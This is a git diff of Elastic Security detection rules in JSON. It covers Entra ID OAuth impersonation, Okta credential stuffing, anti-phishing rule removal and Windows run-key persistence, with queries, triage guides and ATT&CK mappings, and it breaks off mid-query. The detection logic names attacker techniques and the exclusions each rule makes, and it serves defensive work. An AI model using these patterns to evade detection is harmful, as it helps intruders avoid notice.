"94e734c0-2cda-11ef-84e1-f661ea17fbce", "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", diff --git a/packages/security_detection_engine/kibana/security_rule/9563dace-5822-11f0-b1d3-f661ea17fbcd_3.json b/packages/security_detection_engine/kibana/security_rule/9563dace-5822-11f0-b1d3-f661ea17fbcd_3.json new file mode 100644 index 00000000000..f3beeb72276 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9563dace-5822-11f0-b1d3-f661ea17fbcd_3.json @@ -0,0 +1,182 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies rare occurrences of OAuth workflow for a user principal that is single factor authenticated, with an OAuth scope containing user_impersonation for a token issued by Entra ID. Adversaries may use this scope to gain unauthorized access to user accounts, particularly when the sign-in session status is unbound, indicating that the session is not associated with a specific device or session. This behavior is indicative of potential account compromise or unauthorized access attempts. This rule flags when this pattern is detected for a user principal that has not been seen in the last 10 days, indicating potential abuse or unusual activity.", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "filebeat-*", + "logs-azure.signinlogs-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "azure.correlation_id", + "azure.signinlogs.category", + "azure.signinlogs.identity", + "azure.signinlogs.properties.app_display_name", + "azure.signinlogs.properties.app_id", + "azure.signinlogs.properties.app_owner_tenant_id", + "azure.signinlogs.properties.authentication_requirement", + "azure.signinlogs.properties.client_credential_type", + "azure.signinlogs.properties.conditional_access_status", + "azure.signinlogs.properties.device_detail.operating_system", + "azure.signinlogs.properties.is_interactive", + "azure.signinlogs.properties.session_id", + "azure.signinlogs.properties.user_principal_name", + "azure.signinlogs.properties.user_type", + "azure.signinlogs.result_signature", + "azure.tenant_id", + "source.address", + "user.id" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "Entra ID OAuth user_impersonation Scope for Unusual User and Client", + "new_terms_fields": [ + "azure.signinlogs.properties.user_principal_name", + "azure.signinlogs.properties.app_id" + ], + "note": "## Triage and Analysis\n\n### Investigating Entra ID OAuth user_impersonation Scope for Unusual User and Client\n\nIdentifies rare occurrences of OAuth workflow for a user principal that is single factor authenticated, with an OAuth scope containing `user_impersonation`, and a token issuer type of `AzureAD`. This rule is designed to detect suspicious\nOAuth user impersonation attempts in Microsoft Entra ID, particularly those involving the `user_impersonation` scope, which is often used by adversaries to gain unauthorized access to user accounts. The rule focuses on sign-in events where\nthe sign-in session status is `unbound`, indicating that the session is not associated with a specific device or session, making it more vulnerable to abuse. This behavior is indicative of potential account compromise or\nunauthorized access attempts, especially when the user type is `Member` and the sign-in outcome is `success`. The rule aims to identify these events to facilitate timely investigation and response to potential security incidents. This is a New Terms rule that flags when this pattern is detected for a user principal that has not been seen in the last 10 days, indicating potential abuse or unusual activity.\n\n### Possible investigation steps\n\n- Review the `azure.signinlogs.properties.user_principal_name` field to identify the user principal involved in the OAuth workflow.\n- Check the `azure.signinlogs.properties.authentication_processing_details.Oauth Scope Info` field for the presence of `user_impersonation`. This scope is commonly used in OAuth flows to allow applications to access user resources on behalf of the user.\n- Confirm that the `azure.signinlogs.properties.authentication_requirement` is set to `singleFactorAuthentication`, indicating that the sign-in did not require multi-factor authentication (MFA). This can be a red flag, as MFA is a critical security control that helps prevent unauthorized access.\n- Review the `azure.signinlogs.properties.app_display_name` or `azure.signinlogs.properties.app_id` to identify the application involved in the OAuth workflow. Check if this application is known and trusted, or if it appears suspicious or unauthorized. FOCI applications are commonly abused by adversaries to evade security controls or conditional access policies.\n- Analyze the `azure.signinlogs.properties.client_ip` to determine the source of the sign-in attempt. Look for unusual or unexpected IP addresses, especially those associated with known malicious activity or geographic locations that do not align with the user's typical behavior.\n- Examine the `azure.signinlogs.properties.resource_display_name` or `azure.signinlogs.properties.resource_id` to identify the resource being accessed during the OAuth workflow. This can help determine if the access was legitimate or if it targeted sensitive resources. It may also help pivot to other related events or activities.\n- Use the `azure.signinlogs.properties.session_id` or `azure.signinlogs.properties.correlation_id` to correlate this event with other related sign-in events or activities. This can help identify patterns of suspicious behavior or potential account compromise.\n\n### False positive analysis\n\n- Some legitimate applications may use the `user_impersonation` scope for valid purposes, such as accessing user resources on behalf of the user. If this is expected behavior, consider adjusting the rule or adding exceptions for specific applications or user principals.\n- Users may occasionally authenticate using single-factor authentication for specific applications or scenarios, especially in environments where MFA is not enforced or required. If this is expected behavior, consider adjusting the rule or adding exceptions for specific user principals or applications.\n- Some applications may use the `user_impersonation` scope for legitimate purposes, such as accessing user resources in a controlled manner. If this is expected behavior, consider adjusting the rule or adding exceptions for specific applications or user principals.\n\n### Response and remediation\n\n- Contact the user to validate the OAuth workflow and assess whether they were targeted or tricked by a malicious actor.\n- If the OAuth workflow is confirmed to be malicious:\n - Block the user account and reset the password to prevent further unauthorized access.\n - Revoke active sessions and refresh tokens associated with the user principal.\n - Review the application involved in the OAuth workflow and determine if it should be blocked or removed from the tenant.\n - Investigate the source of the sign-in attempt, including the application and IP address, to determine if there are any additional indicators of compromise or ongoing malicious activity.\n - Monitor the user account and related resources for any further suspicious activity or unauthorized access attempts, and take appropriate actions to mitigate any risks identified.\n- Educate users about the risks associated with OAuth user impersonation and encourage them to use more secure authentication methods, such as OAuth 2.0 or OpenID Connect, whenever possible.\n", + "query": "event.dataset: azure.signinlogs and\n azure.signinlogs.properties.authentication_processing_details: *user_impersonation* and\n azure.signinlogs.properties.authentication_requirement: \"singleFactorAuthentication\" and\n azure.signinlogs.properties.token_issuer_type: \"AzureAD\" and\n azure.signinlogs.properties.token_protection_status_details.sign_in_session_status: \"unbound\" and\n azure.signinlogs.properties.user_type: \"Member\" and\n azure.signinlogs.properties.conditional_access_status: \"notApplied\" and\n not user_agent.original: Mozilla*PKeyAuth/1.0 and\n not azure.signinlogs.properties.device_detail.operating_system: (Ios* or Android*) and\n event.outcome: \"success\"\n and not azure.signinlogs.properties.app_id: (\n \"a5f63c0-b750-4f38-a71c-4fc0d58b89e2\" or\n \"6bc3b958-689b-49f5-9006-36d165f30e00\" or\n \"66a88757-258c-4c72-893c-3e8bed4d6899\" or\n \"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\" or\n \"0000000c-0000-0000-c000-000000000000\"\n )\n", + "references": [ + "https://github.com/Flangvik/TeamFiltration", + "https://www.proofpoint.com/us/blog/threat-insight/attackers-unleash-teamfiltration-account-takeover-campaign" + ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.signinlogs.properties.app_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.authentication_processing_details", + "type": "flattened" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.authentication_requirement", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.conditional_access_status", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.device_detail.operating_system", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.token_issuer_type", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.token_protection_status_details.sign_in_session_status", + "type": "unknown" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.user_type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "user_agent.original", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9563dace-5822-11f0-b1d3-f661ea17fbcd", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: Identity", + "Use Case: Threat Detection", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Sign-In Logs", + "Tactic: Initial Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1550", + "name": "Use Alternate Authentication Material", + "reference": "https://attack.mitre.org/techniques/T1550/", + "subtechnique": [ + { + "id": "T1550.001", + "name": "Application Access Token", + "reference": "https://attack.mitre.org/techniques/T1550/001/" + } + ] + }, + { + "id": "T1656", + "name": "Impersonation", + "reference": "https://attack.mitre.org/techniques/T1656/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 3 + }, + "id": "9563dace-5822-11f0-b1d3-f661ea17fbcd_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/95b99adc-2cda-11ef-84e1-f661ea17fbce_204.json b/packages/security_detection_engine/kibana/security_rule/95b99adc-2cda-11ef-84e1-f661ea17fbce_204.json deleted file mode 100644 index 744c5501e30..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/95b99adc-2cda-11ef-84e1-f661ea17fbce_204.json +++ /dev/null @@ -1,78 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects when a high number of Okta user authentication events are reported for multiple users in a short time frame. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts.", - "false_positives": [ - "Users may share an endpoint related to work or personal use in which separate Okta accounts are used.", - "Shared systems such as Kiosks and conference room computers may be used by multiple users." - ], - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Multiple Okta User Authentication Events with Same Device Token Hash", - "note": "## Triage and analysis\n\n### Investigating Multiple Okta User Authentication Events with Same Device Token Hash\n\nThis rule detects when a high number of Okta user authentication events are reported for multiple users in a short time frame. Adversaries may attempt to launch a credential stuffing attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. Note that Okta does not log unrecognized usernames supplied during authentication attempts, so this rule may not detect all credential stuffing attempts or may indicate a targeted attack.\n\n#### Possible investigation steps:\n- Since this is an ES|QL rule, the `okta.actor.alternate_id` and `okta.debug_context.debug_data.dt_hash` values can be used to pivot into the raw authentication events related to this activity.\n- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields.\n- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields.\n- Review the `okta.security_context.is_proxy` field to determine if the device is a proxy.\n - If the device is a proxy, this may indicate that a user is using a proxy to access multiple accounts for password spraying.\n- With the list of `okta.actor.alternate_id` values, review `event.outcome` results to determine if the authentication was successful.\n - If the authentication was successful for any user, pivoting to `event.action` values for those users may provide additional context.\n- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field.\n - Historical analysis should indicate if this device token hash is commonly associated with the user.\n- Review the `okta.event_type` field to determine the type of authentication event that occurred.\n - If the event type is `user.authentication.sso`, the user may have legitimately started a session via a proxy for security or privacy reasons.\n - If the event type is `user.authentication.password`, the user may be using a proxy to access multiple accounts for password spraying.\n- Examine the `okta.outcome.result` field to determine if the authentication was successful.\n- Review the past activities of the actor(s) involved in this action by checking their previous actions.\n- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity.\n - This may help determine the authentication and authorization actions that occurred between the user, Okta and application.\n\n### False positive analysis:\n- A user may have legitimately started a session via a proxy for security or privacy reasons.\n- Users may share an endpoint related to work or personal use in which separate Okta accounts are used.\n - Architecturally, this shared endpoint may leverage a proxy for security or privacy reasons.\n - Shared systems such as Kiosks and conference room computers may be used by multiple users.\n - Shared working spaces may have a single endpoint that is used by multiple users.\n\n### Response and remediation:\n- Review the profile of the users involved in this action to determine if proxy usage may be expected.\n- If the user is legitimate and the authentication behavior is not suspicious based on device analysis, no action is required.\n- If the user is legitimate but the authentication behavior is suspicious, consider resetting passwords for the users involves and enabling multi-factor authentication (MFA).\n - If MFA is already enabled, consider resetting MFA for the users.\n- If any of the users are not legitimate, consider deactivating the user's account.\n- Conduct a review of Okta policies and ensure they are in accordance with security best practices.\n- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user.\n - If so, confirm with the user this was a legitimate request.\n - If so and this was not a legitimate request, consider deactivating the user's account temporarily.\n - Reset passwords and reset MFA for the user.\n- If this is a false positive, consider adding the `okta.debug_context.debug_data.dt_hash` field to the `exceptions` list in the rule.\n - This will prevent future occurrences of this event for this device from triggering the rule.\n", - "query": "FROM logs-okta*\n| WHERE\n event.dataset == \"okta.system\"\n AND (event.action RLIKE \"user\\\\.authentication(.*)\" OR event.action == \"user.session.start\")\n AND okta.debug_context.debug_data.dt_hash != \"-\"\n AND okta.outcome.reason == \"INVALID_CREDENTIALS\"\n| KEEP event.action, okta.debug_context.debug_data.dt_hash, okta.actor.id, okta.actor.alternate_id, okta.outcome.reason\n| STATS\n target_auth_count = COUNT_DISTINCT(okta.actor.id)\n BY okta.debug_context.debug_data.dt_hash, okta.actor.alternate_id\n| WHERE\n target_auth_count > 20\n| SORT\n target_auth_count DESC\n", - "references": [ - "https://support.okta.com/help/s/article/How-does-the-Device-Token-work?language=en_US", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", - "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", - "https://www.okta.com/resources/whitepaper-how-adaptive-mfa-can-help-in-mitigating-brute-force-attacks/", - "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", - "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" - ], - "risk_score": 21, - "rule_id": "95b99adc-2cda-11ef-84e1-f661ea17fbce", - "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.003", - "name": "Password Spraying", - "reference": "https://attack.mitre.org/techniques/T1110/003/" - } - ] - }, - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.004", - "name": "Credential Stuffing", - "reference": "https://attack.mitre.org/techniques/T1110/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 204 - }, - "id": "95b99adc-2cda-11ef-84e1-f661ea17fbce_204", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/95b99adc-2cda-11ef-84e1-f661ea17fbce_207.json b/packages/security_detection_engine/kibana/security_rule/95b99adc-2cda-11ef-84e1-f661ea17fbce_207.json index 394c2522675..d2f5f5696e9 100644 --- a/packages/security_detection_engine/kibana/security_rule/95b99adc-2cda-11ef-84e1-f661ea17fbce_207.json +++ b/packages/security_detection_engine/kibana/security_rule/95b99adc-2cda-11ef-84e1-f661ea17fbce_207.json @@ -23,6 +23,12 @@ "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" ], + "related_integrations": [ + { + "package": "okta", + "version": "^3.0.0" + } + ], "risk_score": 21, "rule_id": "95b99adc-2cda-11ef-84e1-f661ea17fbce", "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", diff --git a/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_207.json b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_207.json deleted file mode 100644 index d697f622593..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_207.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the modification of an anti-phishing rule in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing rules increase this protection by refining settings to better detect and prevent attacks.", - "false_positives": [ - "An anti-phishing rule may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Exchange Anti-Phish Rule Modification", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Exchange Anti-Phish Rule Modification\n\nMicrosoft 365's anti-phishing rules are crucial for safeguarding users against phishing attacks by enhancing detection and prevention settings. Adversaries may attempt to modify or disable these rules to facilitate phishing campaigns, gaining unauthorized access. The detection rule monitors for successful modifications or disabling of anti-phishing rules, signaling potential malicious activity by tracking specific actions within the Exchange environment.\n\n### Possible investigation steps\n\n- Review the event logs for entries with event.dataset set to o365.audit and event.provider set to Exchange to confirm the context of the alert.\n- Check the event.action field for \"Remove-AntiPhishRule\" or \"Disable-AntiPhishRule\" to identify the specific action taken on the anti-phishing rule.\n- Verify the event.outcome field to ensure the action was successful, indicating a potential security concern.\n- Identify the user or account associated with the modification by examining the relevant user fields in the event log.\n- Investigate the user's recent activity and access patterns to determine if there are any other suspicious actions or anomalies.\n- Assess the impact of the rule modification by reviewing any subsequent phishing attempts or security incidents that may have occurred.\n- Consider reverting the changes to the anti-phishing rule and implementing additional security measures if unauthorized access is confirmed.\n\n### False positive analysis\n\n- Administrative changes: Legitimate administrative tasks may involve modifying or disabling anti-phishing rules for testing or configuration purposes. To manage this, create exceptions for known administrative accounts or scheduled maintenance windows.\n- Security audits: Regular security audits might require temporary adjustments to anti-phishing rules. Document these activities and exclude them from alerts by correlating with audit logs.\n- Third-party integrations: Some third-party security tools may interact with Microsoft 365 settings, triggering rule modifications. Identify these tools and exclude their actions from triggering alerts by using their specific identifiers.\n- Policy updates: Organizational policy changes might necessitate updates to anti-phishing rules. Ensure these changes are documented and exclude them from alerts by associating them with approved change management processes.\n\n### Response and remediation\n\n- Immediately isolate the affected user accounts to prevent further unauthorized access and potential spread of phishing attacks.\n- Revert any unauthorized changes to the anti-phishing rules by restoring them to their previous configurations using backup or documented settings.\n- Conduct a thorough review of recent email logs and user activity to identify any potential phishing emails that may have bypassed the modified rules and take steps to quarantine or delete them.\n- Notify the security team and relevant stakeholders about the incident, providing details of the rule modification and any identified phishing attempts.\n- Escalate the incident to the incident response team for further investigation and to determine if additional systems or data have been compromised.\n- Implement enhanced monitoring and alerting for any further attempts to modify anti-phishing rules, ensuring that similar activities are detected promptly.\n- Review and update access controls and permissions for administrative actions within Microsoft 365 to ensure that only authorized personnel can modify security settings.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-AntiPhishRule\" or \"Disable-AntiPhishRule\") and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishrule?view=exchange-ps", - "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-antiphishrule?view=exchange-ps" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "97314185-2568-4561-ae81-f3e480e5e695", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Initial Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1566", - "name": "Phishing", - "reference": "https://attack.mitre.org/techniques/T1566/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "97314185-2568-4561-ae81-f3e480e5e695_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_115.json b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_115.json deleted file mode 100644 index 42a7cbf3e77..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_115.json +++ /dev/null @@ -1,126 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies run key or startup key registry modifications. In order to survive reboots and other system interrupts, attackers will modify run keys within the registry or leverage startup folder items as a form of persistence.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.registry-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Startup or Run Key Registry Modification", - "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and \n registry.data.strings != null and registry.hive : (\"HKEY_USERS\", \"HKLM\") and\n registry.path : (\n /* Machine Hive */\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n /* Users Hive */\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\"\n ) and\n /* add common legitimate changes without being too restrictive as this is one of the most abused AESPs */\n not registry.data.strings : \"ctfmon.exe /n\" and\n not (registry.value : \"Application Restart #*\" and process.name : \"csrss.exe\") and\n not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n not registry.data.strings : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\") and\n not (\n /* Logitech G Hub */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Logitech Inc\" and\n (\n process.name : \"lghub_agent.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\LGHUB\\\\lghub.exe\\\" --background\",\n \"\\\"?:\\\\Program Files\\\\LGHUB\\\\system_tray\\\\lghub_system_tray.exe\\\" --minimized\"\n )\n ) or\n (\n process.name : \"LogiBolt.exe\" and registry.data.strings : (\n \"?:\\\\Program Files\\\\Logi\\\\LogiBolt\\\\LogiBolt.exe --startup\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Logi\\\\LogiBolt\\\\LogiBolt.exe --startup\"\n )\n )\n ) or\n\n /* Google Drive File Stream, Chrome, and Google Update */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Google LLC\" and\n (\n process.name : \"GoogleDriveFS.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\*\\\\GoogleDriveFS.exe\\\" --startup_mode\"\n ) or\n\n process.name : \"chrome.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\",\n \"\\\"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\"\n ) or\n\n process.name : \"GoogleUpdate.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Update\\\\*\\\\GoogleUpdateCore.exe\\\"\"\n )\n )\n ) or\n\n /* MS Programs */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Microsoft Windows\", \"Microsoft Corporation\") and\n (\n process.name : \"msedge.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --no-startup-window 